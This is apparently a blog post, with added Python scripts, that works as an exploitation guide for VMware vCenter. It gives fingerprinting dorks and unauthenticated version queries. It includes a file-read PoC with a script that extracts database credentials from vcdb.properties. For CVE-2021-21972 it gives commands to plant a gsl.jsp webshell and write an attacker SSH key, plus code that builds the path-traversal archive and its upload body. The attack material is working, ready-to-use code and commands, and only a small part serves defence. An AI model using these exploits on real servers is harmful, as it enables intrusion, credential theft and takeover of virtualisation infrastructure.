Vcenter LH Exploit

Common Vulnerabilities

Fingerprint

The vCenter landing page's HTML <title> contains the literal, unexpanded placeholder string, which is what the search-engine dorks below match on:

title="+ ID_VC_Welcome +"

Finding the vCenter version

Method 1

Route: /sdk/vimServiceVersions.xml (unauthenticated; lists the supported API namespaces and their latest version)

Method 2

The vSphere SOAP API also returns version information without authentication: POST the RetrieveServiceContent envelope below to /sdk, and the response carries an <about> block with the product name, version and build number. The request body is:

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <soap:Header>
        <operationID>00000001-00000001</operationID>
    </soap:Header>
    <soap:Body>
        <RetrieveServiceContent
            xmlns="urn:internalvim25">
            <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
        </RetrieveServiceContent>
    </soap:Body>
</soap:Envelope>
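The two version sources above, parsed offline. This is an added example, not code from the original post: the two XML samples are constructed to mirror the real formats, the version and build values in them are placeholders, and the SOAPAction header value in fetch_version is an assumption borrowed from common client scripts.

```python
"""Parse vCenter version information from /sdk/vimServiceVersions.xml (Method 1)
and from the <about> block of a RetrieveServiceContent response (Method 2).
The sample XML below is constructed for this example; values are placeholders."""
import ssl
import sys
import urllib.request
import xml.etree.ElementTree as ET

# Request body from the post, sent as a POST to /sdk.
RETRIEVE_SERVICE_CONTENT = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <soap:Header><operationID>00000001-00000001</operationID></soap:Header>
  <soap:Body>
    <RetrieveServiceContent xmlns="urn:internalvim25">
      <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
    </RetrieveServiceContent>
  </soap:Body>
</soap:Envelope>"""

# Constructed sample of /sdk/vimServiceVersions.xml (same layout as the real file).
SAMPLE_SERVICE_VERSIONS = """<?xml version="1.0" encoding="UTF-8" ?>
<namespaces version="1.0">
  <namespace>
    <name>urn:vim25</name>
    <version>6.7</version>
    <priorVersions>
      <version>6.5</version>
      <version>6.0</version>
    </priorVersions>
  </namespace>
  <namespace>
    <name>urn:vim2</name>
    <version>2.0</version>
  </namespace>
</namespaces>"""

# Constructed sample RetrieveServiceContent response; build number is a placeholder.
SAMPLE_ABOUT_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <RetrieveServiceContentResponse xmlns="urn:internalvim25">
      <returnval>
        <rootFolder type="Folder">group-d1</rootFolder>
        <about>
          <name>VMware vCenter Server</name>
          <fullName>VMware vCenter Server 6.7.0 build-00000000</fullName>
          <vendor>VMware, Inc.</vendor>
          <version>6.7.0</version>
          <build>00000000</build>
          <osType>linux-x64</osType>
          <apiType>VirtualCenter</apiType>
          <apiVersion>6.7.3</apiVersion>
        </about>
      </returnval>
    </RetrieveServiceContentResponse>
  </soapenv:Body>
</soapenv:Envelope>"""


def _local(tag):
    """Drop the XML namespace so urn:vim25 and urn:internalvim25 parse the same way."""
    return tag.rsplit("}", 1)[-1]


def parse_service_versions(xml_text):
    """Method 1: map each API namespace to its newest version (priorVersions ignored)."""
    versions = {}
    for ns in ET.fromstring(xml_text).iter():
        if _local(ns.tag) != "namespace":
            continue
        fields = {_local(c.tag): (c.text or "").strip() for c in ns}
        if fields.get("name"):
            versions[fields["name"]] = fields.get("version")
    return versions


def parse_about(xml_text):
    """Method 2: return the <about> block (name, version, build, ...) as a dict."""
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) == "about":
            return {_local(c.tag): (c.text or "").strip() for c in el}
    return {}


def fetch_version(host, timeout=10):
    """Live query (not exercised offline): POST the envelope to /sdk and parse <about>.
    Certificate checking is disabled because vCenter usually has a self-signed cert."""
    ctx = ssl._create_unverified_context()
    req = urllib.request.Request(
        f"https://{host}/sdk", data=RETRIEVE_SERVICE_CONTENT.encode(),
        headers={"Content-Type": "text/xml", "SOAPAction": "urn:vim25/6.0"})  # assumed value
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        return parse_about(resp.read().decode(errors="replace"))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(fetch_version(sys.argv[1]))
    else:
        print(parse_service_versions(SAMPLE_SERVICE_VERSIONS))
        print(parse_about(SAMPLE_ABOUT_RESPONSE))
```

Run it with a host argument to query a live target; without one it parses the constructed samples. The build number in `<about>` is the value to record: the same `version` string (for example 6.7.0) covers every update release, so only the build distinguishes a patched 6.7 U3l from an unpatched one.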

Arbitrary file read (/eam/vib)

Impact version: VMware vCenter Server <=6.5.0

Fofa Dork: title="ID_VC_Welcome" 

VMware vCenter has an arbitrary file read through the ESX Agent Manager (EAM) endpoint /eam/vib. With it an attacker can read the database account credentials out of the vCenter configuration (vcdb.properties) and use them to take control of the vCenter platform.

The database configuration file is stored in a different directory depending on the vCenter version. The official documentation lists the locations:

vCenter Server 5.5 or lower

  • Windows 2008 - C:\ProgramData\VMware\VMware VirtualCenter
  • Other Windows versions - C:\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\

vCenter Server 6.0, 6.5, 6.7

  • C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx

PoC (replace {{path}} with the directory for the target's version from the list above):

GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
Host: {{Hostname}}
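The file read put to use: try each vcdb.properties location listed above through /eam/vib?id= and pull the JDBC credentials out of the returned Java .properties text. This is an added example, not code from the original post. The sample properties file is constructed (its key names follow the vcdb.properties layout, the values are placeholders), and URL-encoding the path in the id parameter is this example's choice rather than something the post specifies.

```python
"""Read vcdb.properties through the unauthenticated /eam/vib?id= file read and
extract the database credentials. SAMPLE_VCDB is constructed; placeholder values."""
import ssl
import sys
import urllib.parse
import urllib.request

# Candidate vcdb.properties locations, taken from the post.
VCDB_CANDIDATES = [
    r"C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties",   # 6.0 / 6.5 / 6.7
    r"C:\ProgramData\VMware\VMware VirtualCenter\vcdb.properties",            # <= 5.5, Windows 2008
    r"C:\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\vcdb.properties",
]

# Constructed sample of what the endpoint returns; key layout as in vcdb.properties.
SAMPLE_VCDB = """# constructed sample, placeholder values
driver = org.postgresql.Driver
dbtype = PostgreSQL
url = jdbc:postgresql://localhost:5432/VCDB
username = vc
password = REPLACE_ME
password.encrypted = false
"""


def build_vib_url(host, path):
    """GET /eam/vib?id=<path>; the id parameter is the file the unpatched endpoint reads back."""
    return f"https://{host}/eam/vib?id={urllib.parse.quote(path, safe='')}"


def parse_properties(text):
    """Minimal Java .properties parser: '#'/'!' comments, 'key=value' or 'key:value'
    (first separator wins, so 'url = jdbc:...' keeps its colons), backslash continuations."""
    props, pending = {}, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line[0] in "#!":
            continue
        if line.endswith("\\"):            # value continues on the next line
            pending = line[:-1]
            continue
        seps = [i for i in (line.find("="), line.find(":")) if i != -1]
        if seps:
            i = min(seps)
            key, value = line[:i], line[i + 1:]
        else:
            key, value = line, ""
        props[key.strip()] = value.strip()
    return props


def extract_db_credentials(props):
    """The fields that matter: JDBC URL, account and password (plus whether it is encrypted)."""
    return {k: props.get(k) for k in ("url", "username", "password", "password.encrypted")}


def read_vcdb(host, timeout=10):
    """Live use (not exercised offline): try each candidate path until one parses as vcdb.properties."""
    ctx = ssl._create_unverified_context()   # self-signed certificate on most vCenters
    for path in VCDB_CANDIDATES:
        try:
            with urllib.request.urlopen(build_vib_url(host, path), timeout=timeout, context=ctx) as r:
                body = r.read().decode(errors="replace")
        except Exception:
            continue
        props = parse_properties(body)
        if "url" in props:
            return path, extract_db_credentials(props)
    return None, {}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(read_vcdb(sys.argv[1]))
    else:
        print(extract_db_credentials(parse_properties(SAMPLE_VCDB)))
```

If `password.encrypted` is false the value is usable as-is against the VCDB PostgreSQL instance; an encrypted value still tells you the account name and database location, which is why the post treats this file as the pivot to full control.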

CVE-2021-21972

The vROps plugin (com.vmware.vropspluginui.mvc), which is enabled by default, exposes the uploadova endpoint of its ServicesController class without authentication. The uploaded archive is unpacked without sanitizing entry names, so an entry containing ../ escapes the extraction directory and writes a file to a directory of the attacker's choosing, which is enough to drop a webshell.

Impact version:

  • 7.0 <= vCenter Server < 7.0 U1c
  • 6.7 <= vCenter Server < 6.7 U3l
  • 6.5 1e <= vCenter Server < 6.5 U3n
  • 4.x <= Cloud Foundation (vCenter Server) < 4.2
  • 3.x <= Cloud Foundation (vCenter Server) < 3.10.1.2
/ui/vropspluginui/rest/services/uploadova

If a GET to that path returns 404 the plugin endpoint is absent and the vulnerability does not apply; a 405 (Method Not Allowed) means the endpoint exists and expects a POST, so the host may be vulnerable. Note that 405 only proves the endpoint is reachable, not that the traversal is unpatched.

Windows machine:

https://github.com/horizon3ai/CVE-2021-21972.git

python CVE-2021-21972.py -t x.x.x.x -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp

-t (target address)
-f (file to upload)
-p (path of the webshell after upload; the default needs no change)
-o (target OS: win or unix)

The webshell is then reachable at https://x.x.x.x/statsreport/gsl.jsp

The full on-disk path is:

C:/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport

Linux machine

1. Write your SSH public key into the vsphere-ui user's authorized_keys (port 22 must be reachable on the target):

python3 CVE-2021-21972.py -t x.x.x.x -p /home/vsphere-ui/.ssh/authorized_keys -o unix -f id_rsa_2048.pub
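What the Windows and Linux steps above have in common is the archive: an entry whose name climbs out of the directory the OVA is unpacked into and lands on the target path (the statsreport webapp on Windows, the vsphere-ui authorized_keys on Linux). The added example below, which is not the horizon3ai script and not code from the original post, builds such a tar in memory, shows where a naive extractor would write it, and shows the entry-name check a fixed extractor needs. Assumptions: the ../ depth of 6, the Linux extraction directory /tmp/unicorn_ova_dir, and the multipart field name uploadFile are taken from public analyses of this CVE and are not verified here; the boundary string is arbitrary.

```python
"""Build the path-traversal tar at the heart of CVE-2021-21972, show where a
naive extractor would write it, and the check a patched extractor performs.
Traversal depth, extraction directory and multipart field name are assumptions."""
import io
import posixpath
import tarfile

# Destination paths from the post (webshell on Windows, SSH key on Linux).
WINDOWS_TARGET = "ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/gsl.jsp"
LINUX_TARGET = "home/vsphere-ui/.ssh/authorized_keys"
EXTRACT_DIR = "/tmp/unicorn_ova_dir"   # assumed Linux unpack directory


def traversal_entry_name(target, depth=6):
    """'../' * depth then the target: climbs out of the unpack directory, then descends."""
    return "../" * depth + target.lstrip("/")


def build_malicious_tar(entry_name, payload):
    """Bytes of a tar whose single member is named entry_name (tarfile does not sanitize names)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name=entry_name)
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def resolved_paths(tar_bytes, extract_dir=EXTRACT_DIR):
    """Where an extractor that simply joins extract_dir and member.name would write each member."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        return [posixpath.normpath(posixpath.join(extract_dir, m.name)) for m in tar.getmembers()]


def is_safe_member(name, extract_dir=EXTRACT_DIR):
    """The check the vulnerable code lacked: no absolute names, no backslashes,
    and the resolved destination must stay inside extract_dir."""
    if posixpath.isabs(name) or "\\" in name:
        return False
    dest = posixpath.normpath(posixpath.join(extract_dir, name))
    return dest == extract_dir or dest.startswith(extract_dir + "/")


def safe_members(tar_bytes, extract_dir=EXTRACT_DIR):
    """Member names a hardened extractor would accept from this archive."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        return [m.name for m in tar.getmembers() if is_safe_member(m.name, extract_dir)]


def multipart_upload(tar_bytes, field="uploadFile", filename="payload.tar"):
    """Body and Content-Type for a POST to /ui/vropspluginui/rest/services/uploadova
    (field name assumed from public PoCs)."""
    boundary = "----vcenterExampleBoundary"
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n").encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + tar_bytes + tail, f"multipart/form-data; boundary={boundary}"


if __name__ == "__main__":
    for target in (LINUX_TARGET, WINDOWS_TARGET):
        name = traversal_entry_name(target)
        tb = build_malicious_tar(name, b"placeholder payload\n")
        print(name, "->", resolved_paths(tb), "accepted by hardened extractor:", safe_members(tb))
```

The `resolved_paths` output is the whole bug in one line: joining the unpack directory with an untrusted member name and letting normalisation eat the prefix. `is_safe_member` is the fix shape (resolve first, then require the result to remain under the unpack directory); rejecting members is preferable to rewriting their names, since a rewritten name can still collide with something the application later loads.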

CVE-2021-21985

The Virtual SAN Health Check plugin (vsan-h5-client.zip), which is enabled by default, exposes its /rest/* endpoints without authentication; the handler performs unsafe reflective method invocation on attacker-controlled input, which leads to remote code execution.

Impact version:

  • 7.0 <= vCenter Server < 7.0 U2b
  • 6.7 <= vCenter Server < 6.7 U3n
  • 6.5 <= vCenter Server < 6.5 U3p
  • 4.x <= Cloud Foundation (vCenter Server) < 4.2.1
  • 3.x <= Cloud Foundation (vCenter Server) < 3.10.2.1

https://www.geekby.site/2022/05/vcenter%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/#3-%E5%90%8E%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95

See the post-exploitation section of that write-up for what to do after obtaining code execution.

Posted by lisenMiller